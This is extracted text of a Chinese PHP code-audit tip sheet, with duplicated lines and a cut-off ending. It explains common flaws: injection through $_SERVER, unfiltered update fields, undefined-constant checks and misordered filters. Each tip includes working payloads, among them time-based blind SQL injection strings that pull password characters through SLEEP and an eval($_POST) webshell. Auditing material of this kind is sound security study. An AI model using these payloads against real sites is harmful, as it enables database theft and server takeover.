php代码审计作者未知.pdfVIP

PHP码审计

代码审计tips

1、$_SERVER[‘PHP_SELF’]和$_SERVER[‘QUERY_STRING’]，而$_SERVER并没有转义，造成了注入。

/easy/index.php/aaa,(select/**/if((select/**/ord(substr(user(),1,1)))=114,sleep(3),0)),1)#

/easy/index.php/aaa,(select/**/if((select/**/ord(substr(user(),1,1)))=114,sleep(3),0)),1)#

2、update更新时没有重构更新序列，导致更新其他关键字段（金钱、权限）

id=1data=1991-03-16money

id=1data=1991-03-16money

3、在php中如果使用了一个未定义的常量，PHP假定想要的是该常量本身的名字，如同用字符串调用它一样

（CONSTANT对应“CONSTANT”）。此时将发出一个E_NOTICE级的错误（参考

）

未定义常量if(IN_ADMIN!=TRUE)等式不成立，非0、null都为true

未定义常量if(IN_ADMIN!=TRUE)等式不成立，非0、null都为true

4、PHP中自编写对的过滤或关键字过滤，应放在strip_tags等去除函数，否则引起过滤绕过。

functionmystrip_tags($string){$string=remove_xss($string);$string=new_html_special_chars($string);$string=

strip_tags($string);//remove_xss在strip_tags之前调用，所以很明显可以利用strip_tags函数绕过,在关键字中

2

html标记.return$string;}

functionmystrip_tags($string)

{

$string=remove_xss($string);

$string=new_html_special_chars($string);

$string=strip_tags($string);//remove_xss在strip_tags之前调用，所以很明显可以利用strip_tags函数绕过,

在关键字中html标记

return$string;

}

对关键字过滤存在字符替换、html去除等操作可构造多余字符绕过。

提交

user/**/WaHERE/**/IF((SaELECT/**/AaSCII(SaUBSTRING(PASSWORD,1,1))FaROM/**/ts_user/**/L

aIMIT1)=101,1=SaLEEP(2.02),0)%23

user/**/WaHERE/**/IF((SaELECT/**/AaSCII(SaUBSTRING(PASSWORD,1,1))FaROM/**/ts_user/**/LaIMIT

1)=101,1=SaLEEP(2.02),0)%23

由于全局关键字过滤存在strip_tags()函数可绕过。

5、当变量进入双引号中时可形成webshell

$a=${@eval($_POST[s])};$a=${${eval($_POST[s])}};

3

$a=${@eval($_